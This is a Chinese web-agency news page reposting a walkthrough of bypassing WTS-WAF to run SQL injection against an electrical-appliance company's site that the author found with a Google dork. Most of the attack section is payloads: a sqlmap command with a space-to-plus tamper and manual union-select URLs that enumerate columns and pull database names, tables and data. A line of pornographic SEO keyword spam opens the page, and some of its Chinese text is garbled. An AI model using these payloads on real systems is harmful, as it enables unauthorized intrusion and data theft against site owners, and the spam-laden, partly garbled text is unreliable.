日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何進(jìn)行繞過WTS-WAF的分析

本篇文章為大家展示了如何進(jìn)行繞過WTS-WAF的分析,內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細(xì)介紹希望你能有所收獲。

創(chuàng)新互聯(lián)建站是一家集網(wǎng)站建設(shè),海城企業(yè)網(wǎng)站建設(shè),海城品牌網(wǎng)站建設(shè),網(wǎng)站定制,海城網(wǎng)站建設(shè)報(bào)價(jià),網(wǎng)絡(luò)營銷,網(wǎng)絡(luò)優(yōu)化,海城網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè),幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強(qiáng)企業(yè)競爭力??沙浞譂M足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時(shí)我們時(shí)刻保持專業(yè)、時(shí)尚、前沿,時(shí)刻以成就客戶成長自我,堅(jiān)持不斷學(xué)習(xí)、思考、沉淀、凈化自己,讓我們?yōu)楦嗟钠髽I(yè)打造出實(shí)用型網(wǎng)站。

0x01.尋找目標(biāo)

inurl:.php?id= intext:電器

找到了一個(gè)電器公司的網(wǎng)站,隨便測了測,發(fā)現(xiàn)有waf

如何進(jìn)行繞過WTS-WAF的分析

這還不安排(找了點(diǎn)資料,貌似直接加號代替空格就可以,直接嘗試)

0x02.操作

如何進(jìn)行繞過WTS-WAF的分析

發(fā)現(xiàn)沒有waf攔截了

資料還說了

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py

工具我嘗試了發(fā)現(xiàn)無法開始

就這樣子......

如何進(jìn)行繞過WTS-WAF的分析

0x03.手注

http://*/*.php?id=1+and+1=1  #回顯正常
http://*/*.php?id=1+and+1=2  #回顯錯(cuò)誤
說明存在注入

http://*/*.php?id=1+order+by+15  #15回顯錯(cuò)誤
http://*/*.php?id=1+order+by+14  #14回顯正常
說明有14個(gè)字段

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1讓它錯(cuò)誤然后執(zhí)行后面

如何進(jìn)行繞過WTS-WAF的分析

它回顯了第2和第8

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查詢當(dāng)前數(shù)據(jù)庫信息和當(dāng)前用戶
一些常見的函數(shù)
version()  #顯示數(shù)據(jù)庫當(dāng)前版本
database() / schema()  #顯示當(dāng)前數(shù)據(jù)庫名
user() / system_user() / session_user() / current_user() / current_user()  #顯示當(dāng)前用戶名稱
charset(str)  #返回字符串str的字符集
collation(str)  #返回字符串str的字符排列方式

0x04.查數(shù)據(jù)

爆數(shù)據(jù)庫

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

如何進(jìn)行繞過WTS-WAF的分析

它不能group_concat,那我就一個(gè)一個(gè)查了!
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #從1開始取一個(gè)
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #從2開始取一個(gè)

爆數(shù)據(jù)表

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

如何進(jìn)行繞過WTS-WAF的分析

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

爆數(shù)據(jù)

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1

總結(jié):

1.工具跑不起就只能手注了

2.實(shí)踐了下MySQL的手注

上述內(nèi)容就是如何進(jìn)行繞過WTS-WAF的分析,你們學(xué)到知識或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識儲備,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。


網(wǎng)頁標(biāo)題:如何進(jìn)行繞過WTS-WAF的分析
鏈接URL:http://www.dlmjj.cn/article/ggcsse.html